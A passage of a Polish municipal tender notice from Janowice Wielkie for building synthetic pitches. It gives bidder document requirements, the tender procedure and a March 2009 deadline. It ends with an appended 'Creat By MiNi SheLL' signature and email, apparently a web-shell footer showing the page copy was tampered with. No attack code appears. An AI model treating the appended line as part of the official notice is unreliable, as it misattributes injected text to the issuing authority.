4.     W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego winien dołączyć do oferty: 
 1)   dla materiałów na boisko wielofunkcyjne z nawierzchnią syntetyczną - poliuretanową:
a)badanie na zgodność z normą PN-EN 14877 lub, aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wynik badań specjalistycznego laboratorium badającego nawierzchnie sportowe np. Labosport
b)karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta
c)atest PZH dla oferowanej nawierzchni
d)autoryzację producenta nawierzchni poliuretanowej, wystawioną dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię
 
2)    dla materiałów na boisko do piłki nożnej z nawierzchnią syntetyczną - sztuczna trawa: 
e)badanie na zgodność z normą PN-EN 15330 -01 lub, aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wynik badań specjalistycznego laboratorium badającego nawierzchnie sportowe np. Labosport 
f)certyfikat FIFA (1Star lub 2 Star) dla oferowanego systemu nawierzchni, lub wyniki badań laboratoryjnych potwierdzające zgodność parametrów oferowanego systemu nawierzchni  z wymogami FIFA
g)karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta
h)atest PZH dla oferowanej nawierzchni
i)autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

Wyżej wskazane elementy przedmiotu zamówienia muszą spełniać co najmniej  wymogi określone we wskazanych normach, atestach i aprobatach itp. oraz odpowiadać przywołanym parametrom technicznym w SIWZ, Dokumentacji projektowej, Specyfikacji Technicznej Wykonania i odbioru Robót ( w przypadku rozbieżności w poszczególnych dokumentach - należy zachować ich ważność wg kolejności wymienionej wyżej).
Uwaga:
Nie ma wymogu dołączenia do oferty dokumentu potwierdzającego przynależność producenta nawierzchni syntetycznej do ESTO..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.janowice-wielkie.com link BIP.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Urzędu Gminy w Janowicach Wielkich ,  w godzinach urzędowania lub otrzymać drogą elektroniczną zgłaszając takie zapotrzebowanie na adres :  jhanusz@o2.pl  
Wersja papierowa-płatna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2009 godzina 10:15, miejsce: budynek Urzędu Gminy Janowice Wielkie - 58-520 Janowice Wielkie, ul. Kolejowa 2, osobiście -pokój 5 lub za pośrednictwem operatora publicznego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com